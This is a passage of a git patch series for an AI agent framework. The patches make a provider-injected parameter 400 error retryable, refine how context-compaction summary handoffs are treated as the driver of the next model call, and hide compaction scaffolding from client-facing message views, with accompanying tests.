From 8b103cd1303b14fef925d915d0af87564499ffa3 Mon Sep 17 00:00:00 2001 From: kshitijk4poor <82637225+kshitijk4poor@users.noreply.github.com> Date: Fri, 21 Aug 2026 21:25:08 +0530 Subject: [PATCH 001/161] chore: AUTHOR_MAP troy.rowe@re-source.au -> troyrowe-resource Mapping for PR #90261 salvage (server-injected parameter 400 classifier). --- contributors/emails/troy.rowe@re-source.au | 2 ++ 1 file changed, 2 insertions(+) create mode 100644 contributors/emails/troy.rowe@re-source.au diff --git a/contributors/emails/troy.rowe@re-source.au b/contributors/emails/troy.rowe@re-source.au new file mode 100644 index 0000000000..341d62d054 --- /dev/null +++ b/contributors/emails/troy.rowe@re-source.au @@ -0,0 +1,2 @@ +troyrowe-resource +# PR #90261 salvage From 6e5362833877ee370bf243f5b602f45318ae3f69 Mon Sep 17 00:00:00 2001 From: Troy Rowe Date: Wed, 19 Aug 2026 18:24:44 +1000 Subject: [PATCH 002/161] fix(classifier): retry provider-injected parameter 400s instead of aborting The Codex OAuth backend (chatgpt.com/backend-api/codex) intermittently injects prompt_cache_retention into its own upstream call and then rejects it, returning HTTP 400 invalid_parameter. Hermes never sends that field on this route (see agent/transports/codex.py::_default_prompt_cache_retention_ for_request, which only sets it for api.meta.ai and bedrock-mantle hosts). Reproduced live: a minimal 1-message request carrying no cache parameters at all failed 4/20 (20%) with this error, so the rejection is not deterministic and retrying the identical request is the correct recovery. Previously the catch-all in _classify_400 returned format_error/ retryable=False, which tripped the is_client_error abort gate in conversation_loop and killed the turn on the first attempt - burning an entire large-context request (~550k tokens) per failure. Classify these as retryable server_error (should_compress=False - the request shape was never the problem). The same guard is applied to the sibling 5xx request-validation branch, where a fronting proxy can surface the identical rejection. Deliberately narrow: keyed on parameters we only send on specific routes, and skipped when the current provider is one that legitimately sends them, so a genuine client-side bad parameter (max_tokens on GPT-5) still fails fast as a format_error. --- agent/error_classifier.py | 79 +++++++++++++- tests/agent/test_error_classifier.py | 149 +++++++++++++++++++++++++++ 2 files changed, 227 insertions(+), 1 deletion(-) diff --git a/agent/error_classifier.py b/agent/error_classifier.py index 9f112c22a3..514eda3834 100644 --- a/agent/error_classifier.py +++ b/agent/error_classifier.py @@ -459,6 +459,59 @@ _REQUEST_VALIDATION_PATTERNS = [ "unsupported_parameter", ] +# Request parameters that Hermes sends on SOME routes only, paired with the +# providers/hosts where sending them is deliberate. +# +# When a host that is NOT in the allowed set rejects one of these fields, the +# client never put it in the body — the provider's own gateway injected it — +# so the 400 is a server-side flake rather than a deterministic request-shape +# error. See ``_is_server_injected_param_rejection`` and the branch in +# ``_classify_400``. +# +# ``prompt_cache_retention`` is only sent for api.meta.ai and bedrock-mantle +# hosts (agent/transports/codex.py::_default_prompt_cache_retention_for_request). +# The Codex OAuth backend rejects it spontaneously on requests that provably +# never carried it. +_SERVER_INJECTED_PARAM_SENDERS: Dict[str, tuple] = { + "prompt_cache_retention": ("meta", "muse", "msl", "model-api", "bedrock", "mantle"), +} + + +def _is_server_injected_param_rejection(error_msg: str, provider: str) -> bool: + """True when a 400 blames a parameter this route never sends. + + ``error_msg`` is the lowercased, concatenated message text; ``provider`` is + the lowercased provider slug. A match means the rejection cannot be + attributed to our own request shape, so the error is transient and retrying + the identical request is the correct recovery. + + Deliberately conservative: it fires only for known one-route-only + parameters AND only when the current provider is not one of the routes that + actually sends them, so a genuine client-side bad parameter (``max_tokens`` + on a GPT-5 model) still fails fast as a ``format_error``. + """ + if not error_msg: + return False + provider_slug = (provider or "").strip().lower() + for param, senders in _SERVER_INJECTED_PARAM_SENDERS.items(): + if param not in error_msg: + continue + # Require the message to actually be a rejection of that parameter, + # not an incidental mention. + if not ( + "not supported" in error_msg + or "unsupported" in error_msg + or "unknown" in error_msg + or "unrecognized" in error_msg + ): + continue + if any(sender in provider_slug for sender in senders): + # This route sends the field on purpose — a real request error. + return False + return True + return False + + # OpenRouter aggregator policy-block patterns. # # When a user's OpenRouter account privacy setting (or a per-request @@ -1310,11 +1363,16 @@ def _classify_by_status( # server_error" rule turns one bad request into a retry flood. # Detect the unambiguous request-validation signals (in either the # message text or the structured error code) and fail fast. + # + # Exception: a parameter WE never sent on this route was injected by + # the provider/proxy itself, so the rejection is not deterministic and + # the generic retryable-5xx handling is correct. Mirrors the guard in + # _classify_400 — see _is_server_injected_param_rejection. if ( any(p in error_msg for p in _REQUEST_VALIDATION_PATTERNS) or error_code.lower() in {"invalid_request_error", "unknown_parameter", "unsupported_parameter"} - ): + ) and not _is_server_injected_param_rejection(error_msg, provider): return result_fn( FailoverReason.format_error, retryable=False, @@ -1473,6 +1531,25 @@ def _classify_400( should_fallback=False, ) + # Server-injected parameter rejection: a 400 blaming a request field the + # client never sent. MUST be checked BEFORE the request-validation branch + # below, which would otherwise class it as a deterministic format_error and + # abort the turn. + # + # Observed live on the Codex OAuth backend (chatgpt.com/backend-api/codex): + # it intermittently adds ``prompt_cache_retention`` to its own upstream + # call and then rejects it, so a byte-identical request succeeds on retry + # (measured ~20% failure over n=20 on a minimal 1-message request that + # provably carried no cache parameters). Retrying is the correct and only + # recovery; failing fast burnt an entire large-context request per attempt. + if _is_server_injected_param_rejection(error_msg, provider): + return result_fn( + FailoverReason.server_error, + retryable=True, + # The request shape was fine — never route this into compression. + should_compress=False, + ) + # Request-validation errors (unsupported / unknown parameter) MUST be # checked BEFORE context_overflow. A GPT-5 model rejecting max_tokens # returns: diff --git a/tests/agent/test_error_classifier.py b/tests/agent/test_error_classifier.py index 6f42ba0b73..52eb723380 100644 --- a/tests/agent/test_error_classifier.py +++ b/tests/agent/test_error_classifier.py @@ -1292,3 +1292,152 @@ class TestExpandedOverflowPatterns: assert result.reason == FailoverReason.context_overflow +class TestServerInjectedParameterRejection: + """A 400 blaming a parameter the client never sent is a server-side flake. + + The Codex backend (chatgpt.com/backend-api/codex) intermittently adds + ``prompt_cache_retention`` to its own upstream call and then rejects it, + so an identical request succeeds on retry ~80% of the time. Hermes never + sends that field on this route, so the 400 is not a deterministic + request-shape error and must stay retryable instead of aborting the turn. + """ + + RETENTION_BODY = { + "message": "prompt_cache_retention is not supported on this model", + "type": "invalid_request_error", + "param": "prompt_cache_retention", + "code": "invalid_parameter", + } + + def test_codex_retention_400_is_retryable_server_error(self): + e = MockAPIError( + "Error code: 400 - {'error': {'message': 'prompt_cache_retention " + "is not supported on this model', 'type': 'invalid_request_error', " + "'param': 'prompt_cache_retention', 'code': 'invalid_parameter'}}", + status_code=400, + body=dict(self.RETENTION_BODY), + ) + result = classify_api_error( + e, + provider="openai-codex", + model="gpt-5.6-sol", + approx_tokens=546912, + context_length=272000, + num_messages=576, + ) + assert result.reason == FailoverReason.server_error + assert result.retryable is True + # Retrying the identical request is the recovery — do NOT enter the + # compression loop (the context was never the problem). + assert result.should_compress is False + + def test_codex_retention_400_nested_error_body_is_retryable(self): + """The same rejection arrives wrapped in an ``error`` envelope too.""" + e = MockAPIError( + "prompt_cache_retention is not supported on this model", + status_code=400, + body={"error": dict(self.RETENTION_BODY)}, + ) + result = classify_api_error( + e, provider="openai-codex", model="gpt-5.6-sol", + ) + assert result.reason == FailoverReason.server_error + assert result.retryable is True + + def test_codex_gateway_terse_retention_400_is_retryable(self): + """The Codex gateway's own validator uses a bare ``detail`` body.""" + e = MockAPIError( + "Unsupported parameter: prompt_cache_retention", + status_code=400, + body={"detail": "Unsupported parameter: prompt_cache_retention"}, + ) + result = classify_api_error( + e, provider="openai-codex", model="gpt-5.6-sol", + ) + assert result.reason == FailoverReason.server_error + assert result.retryable is True + + def test_small_session_retention_400_is_still_retryable(self): + """Must not depend on the context-size heuristic — a tiny request + gets the identical spontaneous rejection (reproduced live).""" + e = MockAPIError( + "prompt_cache_retention is not supported on this model", + status_code=400, + body=dict(self.RETENTION_BODY), + ) + result = classify_api_error( + e, + provider="openai-codex", + model="gpt-5.6-sol", + approx_tokens=50, + num_messages=1, + ) + assert result.reason == FailoverReason.server_error + assert result.retryable is True + + def test_other_unsupported_parameter_400_stays_non_retryable(self): + """Boundary: a genuine client-sent bad parameter is deterministic and + must keep failing fast as a format_error (the existing behaviour).""" + e = MockAPIError( + "Unsupported parameter: 'max_tokens' is not supported with this " + "model. Use 'max_completion_tokens' instead.", + status_code=400, + body={ + "message": "Unsupported parameter: 'max_tokens' is not supported.", + "type": "invalid_request_error", + "param": "max_tokens", + "code": "unsupported_parameter", + }, + ) + result = classify_api_error( + e, provider="openai-codex", model="gpt-5.6-sol", + ) + assert result.reason == FailoverReason.format_error + assert result.retryable is False + + def test_retention_rejection_from_meta_host_stays_non_retryable(self): + """Boundary: on api.meta.ai / Bedrock Mantle Hermes DOES send + ``prompt_cache_retention`` deliberately, so a rejection there is a + real client-side request error and must not be retried blindly.""" + e = MockAPIError( + "prompt_cache_retention is not supported on this model", + status_code=400, + body=dict(self.RETENTION_BODY), + ) + result = classify_api_error( + e, provider="meta-ai", model="muse-spark-1.2", + ) + assert result.reason == FailoverReason.format_error + assert result.retryable is False + + @pytest.mark.parametrize("status_code", [500, 502]) + def test_retention_rejection_via_5xx_proxy_is_retryable(self, status_code): + """Sibling path: a proxy in front of the route can surface the same + injected-parameter rejection as 5xx, where the request-validation + guard would also wrongly fail it fast as a format_error.""" + e = MockAPIError( + "Unsupported parameter: prompt_cache_retention", + status_code=status_code, + body={"error": dict(self.RETENTION_BODY)}, + ) + result = classify_api_error( + e, provider="openai-codex", model="gpt-5.6-sol", + ) + assert result.reason == FailoverReason.server_error + assert result.retryable is True + + @pytest.mark.parametrize("status_code", [500, 502]) + def test_other_bad_parameter_via_5xx_stays_non_retryable(self, status_code): + """Boundary for the sibling path: the codex.nekos.me 502-on-bad-param + behaviour must keep failing fast (regression guard for that fix).""" + e = MockAPIError( + "Unknown parameter: 'frequency_penalty'", + status_code=status_code, + body={"error": {"message": "Unknown parameter: 'frequency_penalty'", + "code": "unknown_parameter"}}, + ) + result = classify_api_error(e, provider="custom", model="m") + assert result.reason == FailoverReason.format_error + assert result.retryable is False + + From fdf01114100c848da5a5095f5a52e538bb95cbec Mon Sep 17 00:00:00 2001 From: abundantbeing Date: Thu, 13 Aug 2026 22:31:41 +0700 Subject: [PATCH 003/161] fix(agent): guard merged assistant compaction handoffs Treat a merged assistant-role summary carrier as the driving reference handoff when it immediately follows a completed assistant stop. Its preserved prose and stale tool_calls are assistant continuity, not a fresh live user request. Keep legitimate in-flight behavior unchanged when there is no completed stop, a real user turn follows, or a distinct later assistant tool-call row continues the loop. Extends the #80622 active-turn guard for the merged-carrier shape reported under #42768. --- agent/context_compressor.py | 21 ++++- .../test_reference_handoff_active_turn.py | 85 +++++++++++++++++++ 2 files changed, 104 insertions(+), 2 deletions(-) diff --git a/agent/context_compressor.py b/agent/context_compressor.py index 4c48794fb2..7439d800ea 100644 --- a/agent/context_compressor.py +++ b/agent/context_compressor.py @@ -7978,8 +7978,25 @@ def reference_handoff_would_drive_next_model_call( for index, message in enumerate(messages): if not is_compaction_summary_message(message): continue - if _handoff_carries_live_user_content(message): - # Embedded live ask — this row is not a sole-handoff driver. + previous = messages[index - 1] if index > 0 else None + merged_completed_assistant = ( + isinstance(message, dict) + and message.get("role") == "assistant" + and ContextCompressor.classify_summary_content( + message.get("content") + ) + == "merged" + and isinstance(previous, dict) + and previous.get("role") == "assistant" + and previous.get("finish_reason") == "stop" + ) + if ( + _handoff_carries_live_user_content(message) + and not merged_completed_assistant + ): + # Embedded live ask — this row is not a sole-handoff driver. A + # merged assistant carrier after a completed stop preserves the + # assistant's own prose/tool_calls, not a fresh user request. continue last_driving_handoff = index diff --git a/tests/agent/test_reference_handoff_active_turn.py b/tests/agent/test_reference_handoff_active_turn.py index 4e62b0f9b8..66b9fb06e3 100644 --- a/tests/agent/test_reference_handoff_active_turn.py +++ b/tests/agent/test_reference_handoff_active_turn.py @@ -14,8 +14,11 @@ from agent.context_compressor import ( COMPRESSED_SUMMARY_HAS_USER_TURN_KEY, COMPRESSED_SUMMARY_METADATA_KEY, COMPRESSION_CONTINUATION_USER_CONTENT, + ContextCompressor, HISTORICAL_TASK_HEADING, SUMMARY_PREFIX, + _MERGED_PRIOR_CONTEXT_HEADER, + _MERGED_SUMMARY_DELIMITER, _SUMMARY_END_MARKER, is_compaction_summary_message, is_user_originated_turn, @@ -39,6 +42,24 @@ def _standalone_handoff(task: str = "finish the already-done refactor") -> dict: } +def _merged_assistant_carrier() -> dict: + """Production merge-into-tail shape: assistant role/tool_calls survive.""" + return { + "role": "assistant", + "content": ( + f"{_MERGED_PRIOR_CONTEXT_HEADER}\n" + "Refactor complete.\n\n" + f"{_MERGED_SUMMARY_DELIMITER}\n" + f"{SUMMARY_PREFIX}\n{HISTORICAL_TASK_HEADING}\n" + "User asked: 'finish the already-done refactor'\n\n" + f"{_SUMMARY_END_MARKER}" + ), + "tool_calls": [{"id": "stale-c1", "function": {"name": "terminal"}}], + COMPRESSED_SUMMARY_METADATA_KEY: True, + COMPRESSED_SUMMARY_HAS_USER_TURN_KEY: True, + } + + class TestReferenceHandoffWouldDriveNextModelCall: def test_standalone_handoff_alone_drives(self): messages = [_standalone_handoff()] @@ -76,6 +97,70 @@ class TestReferenceHandoffWouldDriveNextModelCall: ] assert reference_handoff_would_drive_next_model_call(messages) is False + def test_merged_assistant_carrier_after_completed_stop_drives(self): + """Completed assistant prose/tool_calls on the carrier are not a user ask.""" + messages = [ + {"role": "user", "content": "please finish the refactor"}, + { + "role": "assistant", + "content": "Refactor complete.", + "finish_reason": "stop", + }, + _merged_assistant_carrier(), + ] + assert reference_handoff_would_drive_next_model_call(messages) is True + + def test_merged_assistant_carrier_without_completed_stop_stays_in_flight(self): + messages = [ + {"role": "user", "content": "please finish the refactor"}, + _merged_assistant_carrier(), + ] + assert reference_handoff_would_drive_next_model_call(messages) is False + + def test_standalone_assistant_handoff_after_stop_uses_existing_guard(self): + handoff = _standalone_handoff() + handoff["role"] = "assistant" + messages = [ + { + "role": "assistant", + "content": "Refactor complete.", + "finish_reason": "stop", + }, + handoff, + ] + assert ContextCompressor.classify_summary_content(handoff["content"]) == ( + "standalone" + ) + assert reference_handoff_would_drive_next_model_call(messages) is True + + def test_real_user_after_merged_assistant_carrier_does_not_drive(self): + messages = [ + { + "role": "assistant", + "content": "Refactor complete.", + "finish_reason": "stop", + }, + _merged_assistant_carrier(), + {"role": "user", "content": "start a different task"}, + ] + assert reference_handoff_would_drive_next_model_call(messages) is False + + def test_distinct_tool_call_after_merged_carrier_stays_in_flight(self): + messages = [ + { + "role": "assistant", + "content": "Refactor complete.", + "finish_reason": "stop", + }, + _merged_assistant_carrier(), + { + "role": "assistant", + "content": None, + "tool_calls": [{"id": "live-c2", "function": {"name": "terminal"}}], + }, + ] + assert reference_handoff_would_drive_next_model_call(messages) is False + def test_embedded_remainder_after_end_marker_does_not_drive(self): messages = [ { From 6b7aee2f80ec5c2d6805c8a5145b2f7a084a3286 Mon Sep 17 00:00:00 2001 From: abundantbeing Date: Wed, 19 Aug 2026 23:08:41 +0700 Subject: [PATCH 004/161] fix(agent): preserve live merged tool-call carriers Identify a completed merged assistant handoff from the carrier's own stop state instead of an unrelated adjacent history row. Keep carriers with pending tool calls actionable so compaction cannot abort a live tool chain. --- agent/context_compressor.py | 11 +++--- .../test_reference_handoff_active_turn.py | 37 ++++++++++++------- 2 files changed, 28 insertions(+), 20 deletions(-) diff --git a/agent/context_compressor.py b/agent/context_compressor.py index 7439d800ea..2a0b5dc4a4 100644 --- a/agent/context_compressor.py +++ b/agent/context_compressor.py @@ -7978,7 +7978,6 @@ def reference_handoff_would_drive_next_model_call( for index, message in enumerate(messages): if not is_compaction_summary_message(message): continue - previous = messages[index - 1] if index > 0 else None merged_completed_assistant = ( isinstance(message, dict) and message.get("role") == "assistant" @@ -7986,17 +7985,17 @@ def reference_handoff_would_drive_next_model_call( message.get("content") ) == "merged" - and isinstance(previous, dict) - and previous.get("role") == "assistant" - and previous.get("finish_reason") == "stop" + and message.get("finish_reason") == "stop" + and not message.get("tool_calls") ) if ( _handoff_carries_live_user_content(message) and not merged_completed_assistant ): # Embedded live ask — this row is not a sole-handoff driver. A - # merged assistant carrier after a completed stop preserves the - # assistant's own prose/tool_calls, not a fresh user request. + # completed merged assistant carrier preserves the assistant's own + # prose, not a fresh user request. A carrier with pending tool_calls + # remains live regardless of an earlier completed assistant turn. continue last_driving_handoff = index diff --git a/tests/agent/test_reference_handoff_active_turn.py b/tests/agent/test_reference_handoff_active_turn.py index 66b9fb06e3..49767bc8f3 100644 --- a/tests/agent/test_reference_handoff_active_turn.py +++ b/tests/agent/test_reference_handoff_active_turn.py @@ -42,9 +42,11 @@ def _standalone_handoff(task: str = "finish the already-done refactor") -> dict: } -def _merged_assistant_carrier() -> dict: - """Production merge-into-tail shape: assistant role/tool_calls survive.""" - return { +def _merged_assistant_carrier( + *, finish_reason: str = "stop", tool_calls: list[dict] | None = None +) -> dict: + """Production merge-into-tail shape with the carrier's completion state.""" + carrier = { "role": "assistant", "content": ( f"{_MERGED_PRIOR_CONTEXT_HEADER}\n" @@ -54,10 +56,13 @@ def _merged_assistant_carrier() -> dict: "User asked: 'finish the already-done refactor'\n\n" f"{_SUMMARY_END_MARKER}" ), - "tool_calls": [{"id": "stale-c1", "function": {"name": "terminal"}}], + "finish_reason": finish_reason, COMPRESSED_SUMMARY_METADATA_KEY: True, COMPRESSED_SUMMARY_HAS_USER_TURN_KEY: True, } + if tool_calls is not None: + carrier["tool_calls"] = tool_calls + return carrier class TestReferenceHandoffWouldDriveNextModelCall: @@ -97,23 +102,27 @@ class TestReferenceHandoffWouldDriveNextModelCall: ] assert reference_handoff_would_drive_next_model_call(messages) is False - def test_merged_assistant_carrier_after_completed_stop_drives(self): - """Completed assistant prose/tool_calls on the carrier are not a user ask.""" + def test_completed_merged_assistant_carrier_drives_without_adjacent_stop(self): + """The carrier's own stop marks preserved assistant prose as completed.""" messages = [ + {"role": "system", "content": "system"}, {"role": "user", "content": "please finish the refactor"}, - { - "role": "assistant", - "content": "Refactor complete.", - "finish_reason": "stop", - }, _merged_assistant_carrier(), ] assert reference_handoff_would_drive_next_model_call(messages) is True - def test_merged_assistant_carrier_without_completed_stop_stays_in_flight(self): + def test_live_tool_call_carrier_after_completed_stop_stays_in_flight(self): + """Pending tool_calls on the carrier are live even after an earlier stop.""" messages = [ - {"role": "user", "content": "please finish the refactor"}, - _merged_assistant_carrier(), + { + "role": "assistant", + "content": "Earlier turn complete.", + "finish_reason": "stop", + }, + _merged_assistant_carrier( + finish_reason="tool_calls", + tool_calls=[{"id": "live-c1", "function": {"name": "terminal"}}], + ), ] assert reference_handoff_would_drive_next_model_call(messages) is False From 97e32d49acd54906c16d31544ec79971b4fb7de0 Mon Sep 17 00:00:00 2001 From: abundantbeing Date: Thu, 13 Aug 2026 23:52:57 +0700 Subject: [PATCH 005/161] fix(api): hide compaction scaffolding from clients Project client-visible session messages through the canonical compaction classifier. Hide standalone handoffs, unwrap merged carriers to their authentic prior-tail content, strip inherited internal fields, and keep model-facing recovery history unchanged. --- gateway/platforms/api_server.py | 75 +++++-- .../test_api_server_compaction_projection.py | 212 ++++++++++++++++++ 2 files changed, 264 insertions(+), 23 deletions(-) create mode 100644 tests/gateway/test_api_server_compaction_projection.py diff --git a/gateway/platforms/api_server.py b/gateway/platforms/api_server.py index 30ed5a8108..a0d2295c7f 100644 --- a/gateway/platforms/api_server.py +++ b/gateway/platforms/api_server.py @@ -418,31 +418,53 @@ def _request_agent_overrides( return overrides -def _message_text_prefix(content: Any) -> str: - if isinstance(content, str): - return content[:128] - if not isinstance(content, list): - return "" - parts: List[str] = [] - for item in content[:4]: - if isinstance(item, str): - parts.append(item) - elif isinstance(item, dict): - text = item.get("text") - if isinstance(text, str): - parts.append(text) - if sum(len(part) for part in parts) >= 128: - break - return "\n".join(parts)[:128] - - def _is_compressed_summary_message(message: Any) -> bool: + """Recognize every model-side compaction carrier shape. + + SessionDB does not persist the in-process metadata marker, so client + projections must share the compressor's content classifier rather than a + prefix-only approximation that misses merge-into-tail carriers. + """ if not isinstance(message, dict): return False - if message.get(_COMPRESSED_SUMMARY_METADATA_KEY): - return True - prefix = _message_text_prefix(message.get("content")) - return prefix.startswith("[CONTEXT COMPACTION") or prefix.startswith("[CONTEXT SUMMARY]:") + from agent.context_compressor import is_compaction_summary_message + + return is_compaction_summary_message(message) + + +def _project_client_message(message: Dict[str, Any]) -> Dict[str, Any]: + """Remove model-only compaction scaffolding from a client message. + + Standalone handoffs have no transcript content and remain as hidden empty + rows so clients can reconcile stable message identities. Merged handoffs + preserve only the real prior-tail content that precedes the internal + summary delimiter. Tool calls are dropped from both shapes because a + carrier's inherited calls are historical context, not live client output. + """ + projected = message.copy() + if not _is_compressed_summary_message(projected): + return projected + + from agent.context_compressor import ContextCompressor + + unwrapped = ContextCompressor._strip_context_summary_handoff_message( + projected + ) + for internal_key in ( + "tool_calls", + "finish_reason", + "reasoning", + "reasoning_content", + ): + projected.pop(internal_key, None) + if unwrapped is None: + projected["content"] = "" + projected["display_kind"] = "hidden" + return projected + + projected["content"] = unwrapped.get("content") + projected.pop("display_kind", None) + return projected def _auto_truncate_response_history( @@ -3358,10 +3380,11 @@ class APIServerAdapter(BasePlatformAdapter): @staticmethod def _message_response(message: Dict[str, Any]) -> Dict[str, Any]: + message = _project_client_message(message) safe_keys = ( "id", "session_id", "role", "content", "tool_call_id", "tool_calls", "tool_name", "timestamp", "token_count", "finish_reason", "reasoning", - "reasoning_content", + "reasoning_content", "display_kind", ) return {key: message.get(key) for key in safe_keys if key in message} @@ -6186,6 +6209,12 @@ class APIServerAdapter(BasePlatformAdapter): continue if msg.get("role") not in {"assistant", "tool"}: continue + if _is_compressed_summary_message(msg): + projected = cls._message_response(msg) + if projected.get("display_kind") == "hidden": + continue + out.append(projected) + continue out.append(cls._message_response(msg)) return out diff --git a/tests/gateway/test_api_server_compaction_projection.py b/tests/gateway/test_api_server_compaction_projection.py new file mode 100644 index 0000000000..ebbdcddc91 --- /dev/null +++ b/tests/gateway/test_api_server_compaction_projection.py @@ -0,0 +1,212 @@ +"""Client projections must not expose model-only compaction scaffolding.""" + +from __future__ import annotations + +from aiohttp.test_utils import TestClient, TestServer +import pytest + +from agent.context_compressor import ( + COMPRESSED_SUMMARY_METADATA_KEY, + HISTORICAL_TASK_HEADING, + SUMMARY_PREFIX, + _MERGED_PRIOR_CONTEXT_HEADER, + _MERGED_SUMMARY_DELIMITER, + _SUMMARY_END_MARKER, +) +from gateway.config import PlatformConfig +from gateway.platforms.api_server import ( + APIServerAdapter, + _is_compressed_summary_message, +) +from hermes_state import SessionDB + + +STANDALONE_SUMMARY = ( + f"{SUMMARY_PREFIX}\n\n" + f"{HISTORICAL_TASK_HEADING}\nold work\n\n" + f"{_SUMMARY_END_MARKER}" +) +MERGED_CARRIER = ( + f"{_MERGED_PRIOR_CONTEXT_HEADER}\n" + "Refactor complete.\n\n" + f"{_MERGED_SUMMARY_DELIMITER}\n\n" + f"{STANDALONE_SUMMARY}" +) +REAL_USER = "test the browser controller again" + + +def _row(role: str, content, **extra) -> dict: + row = {"id": 1, "session_id": "s1", "role": role, "content": content} + row.update(extra) + return row + + +@pytest.fixture +def session_db(tmp_path): + db = SessionDB(tmp_path / "state.db") + try: + yield db + finally: + close = getattr(db, "close", None) + if callable(close): + close() + + +@pytest.fixture +def adapter(session_db): + adapter = APIServerAdapter(PlatformConfig(enabled=True)) + adapter._session_db = session_db + return adapter + + +def _messages_app(adapter: APIServerAdapter): + from aiohttp import web + + app = web.Application() + app.router.add_get( + "/api/sessions/{session_id}/messages", + adapter._handle_session_messages, + ) + return app + + +class TestMessageProjection: + def test_standalone_summary_is_hidden_without_scaffolding(self): + projected = APIServerAdapter._message_response( + _row( + "user", + STANDALONE_SUMMARY, + tool_calls=[{"id": "stale"}], + reasoning="internal compression reasoning", + reasoning_content="internal compression reasoning", + ) + ) + + assert projected["content"] == "" + assert projected["display_kind"] == "hidden" + assert "tool_calls" not in projected + assert "finish_reason" not in projected + assert "reasoning" not in projected + assert "reasoning_content" not in projected + + def test_merged_carrier_preserves_only_real_prior_content(self): + projected = APIServerAdapter._message_response( + _row( + "assistant", + MERGED_CARRIER, + tool_calls=[{"id": "prior-call"}], + finish_reason="tool_calls", + ) + ) + + assert projected["content"] == "Refactor complete." + assert "tool_calls" not in projected + assert "finish_reason" not in projected + assert "PRIOR CONTEXT" not in projected["content"] + assert "CONTEXT COMPACTION" not in projected["content"] + + def test_merged_content_array_preserves_blocks_before_summary(self): + projected = APIServerAdapter._message_response( + _row( + "user", + [ + { + "type": "text", + "text": f"{_MERGED_PRIOR_CONTEXT_HEADER}\n{REAL_USER}", + }, + { + "type": "text", + "text": f"{_MERGED_SUMMARY_DELIMITER}\n{STANDALONE_SUMMARY}", + }, + ], + ) + ) + + assert projected["content"] == [{"type": "text", "text": REAL_USER}] + + def test_real_message_that_mentions_marker_text_is_untouched(self): + content = "please explain the string [CONTEXT COMPACTION] in this bug report" + projected = APIServerAdapter._message_response(_row("user", content)) + + assert projected["content"] == content + assert "display_kind" not in projected + + def test_unrelated_hidden_message_is_not_reclassified_as_compaction(self): + message = _row("assistant", "ordinary hidden control row", display_kind="hidden") + + assert _is_compressed_summary_message(message) is False + + +class TestSummaryRecognizer: + @pytest.mark.parametrize( + "message", + [ + _row("user", STANDALONE_SUMMARY), + _row("assistant", MERGED_CARRIER), + _row("assistant", "metadata-only", **{COMPRESSED_SUMMARY_METADATA_KEY: True}), + ], + ) + def test_recognizes_all_compaction_carrier_shapes(self, message): + assert _is_compressed_summary_message(message) is True + + def test_ignores_real_message(self): + assert _is_compressed_summary_message(_row("user", REAL_USER)) is False + + +class TestTurnTranscriptProjection: + def test_run_completed_strips_scaffolding_but_keeps_real_carrier_content(self): + result = { + "messages": [ + {"role": "user", "content": REAL_USER}, + {"role": "assistant", "content": "checking the controller"}, + _row("user", STANDALONE_SUMMARY), + _row("assistant", MERGED_CARRIER), + {"role": "assistant", "content": "the controller is ready"}, + ], + "final_response": "the controller is ready", + } + + turn = APIServerAdapter._turn_transcript_messages( + [{"role": "user", "content": REAL_USER}], + REAL_USER, + result, + ) + + assert [message.get("content") for message in turn] == [ + "checking the controller", + "Refactor complete.", + "the controller is ready", + ] + + +class TestMessagesEndpointProjection: + @pytest.mark.asyncio + async def test_messages_endpoint_never_serves_compaction_scaffolding( + self, + adapter, + session_db, + ): + session_id = session_db.create_session("projection-session", "api_server") + session_db.replace_messages( + session_id, + [ + _row("user", STANDALONE_SUMMARY), + _row("assistant", MERGED_CARRIER), + _row("user", REAL_USER), + ], + ) + + async with TestClient(TestServer(_messages_app(adapter))) as client: + response = await client.get(f"/api/sessions/{session_id}/messages") + assert response.status == 200 + payload = await response.json() + + messages = payload["data"] + assert len(messages) == 3 + assert messages[0]["content"] == "" + assert messages[0]["display_kind"] == "hidden" + assert messages[1]["content"] == "Refactor complete." + assert messages[2]["content"] == REAL_USER + rendered = " ".join(str(message.get("content") or "") for message in messages) + assert "PRIOR CONTEXT" not in rendered + assert "CONTEXT COMPACTION" not in rendered From a2a23a8f7e30e644702459cfe0c4c74897524cfd Mon Sep 17 00:00:00 2001 From: abundantbeing Date: Wed, 19 Aug 2026 23:08:40 +0700 Subject: [PATCH 006/161] fix(clients): hide compaction carriers across surfaces --- agent/compaction_display.py | 47 +++++++++ gateway/platforms/api_server.py | 34 +++---- gateway/run.py | 8 +- hermes_state.py | 6 ++ hermes_state_common.py | 88 ++++++++++++++++- hermes_state_portability.py | 3 + .../test_api_server_compaction_projection.py | 20 +++- tests/gateway/test_telegram_topic_mode.py | 68 +++++++++++++ tests/test_session_skill_previews.py | 96 ++++++++++++++++++- tests/test_tui_gateway_server.py | 77 +++++++++++++++ tui_gateway/server.py | 4 + 11 files changed, 422 insertions(+), 29 deletions(-) create mode 100644 agent/compaction_display.py diff --git a/agent/compaction_display.py b/agent/compaction_display.py new file mode 100644 index 0000000000..ea1e61ed77 --- /dev/null +++ b/agent/compaction_display.py @@ -0,0 +1,47 @@ +"""Client-facing projection helpers for model-only compaction carriers.""" + +from __future__ import annotations + +from typing import Any, Dict, Optional + +from agent.context_compressor import ( + ContextCompressor, + is_compaction_summary_message, +) + + +_COMPACTION_INTERNAL_FIELDS = ( + "tool_calls", + "finish_reason", + "reasoning", + "reasoning_content", + "reasoning_details", + "codex_reasoning_items", + "codex_message_items", +) + + +def project_compaction_message_for_display( + message: Dict[str, Any], +) -> Optional[Dict[str, Any]]: + """Return authentic transcript content, or ``None`` for a pure handoff. + + Model-facing recovery history retains the complete carrier. Display + projections instead remove the handoff, inherited tool state, and internal + reasoning while preserving any real prior-tail content or live user ask + embedded in the carrier. + """ + if not isinstance(message, dict): + return None + if not is_compaction_summary_message(message): + return message.copy() + + projected = ContextCompressor._strip_context_summary_handoff_message(message) + if projected is None: + return None + + projected = projected.copy() + for key in _COMPACTION_INTERNAL_FIELDS: + projected.pop(key, None) + projected.pop("display_kind", None) + return projected diff --git a/gateway/platforms/api_server.py b/gateway/platforms/api_server.py index a0d2295c7f..143aae20c7 100644 --- a/gateway/platforms/api_server.py +++ b/gateway/platforms/api_server.py @@ -441,29 +441,23 @@ def _project_client_message(message: Dict[str, Any]) -> Dict[str, Any]: summary delimiter. Tool calls are dropped from both shapes because a carrier's inherited calls are historical context, not live client output. """ - projected = message.copy() - if not _is_compressed_summary_message(projected): - return projected + from agent.compaction_display import project_compaction_message_for_display - from agent.context_compressor import ContextCompressor - - unwrapped = ContextCompressor._strip_context_summary_handoff_message( - projected - ) - for internal_key in ( - "tool_calls", - "finish_reason", - "reasoning", - "reasoning_content", - ): - projected.pop(internal_key, None) - if unwrapped is None: 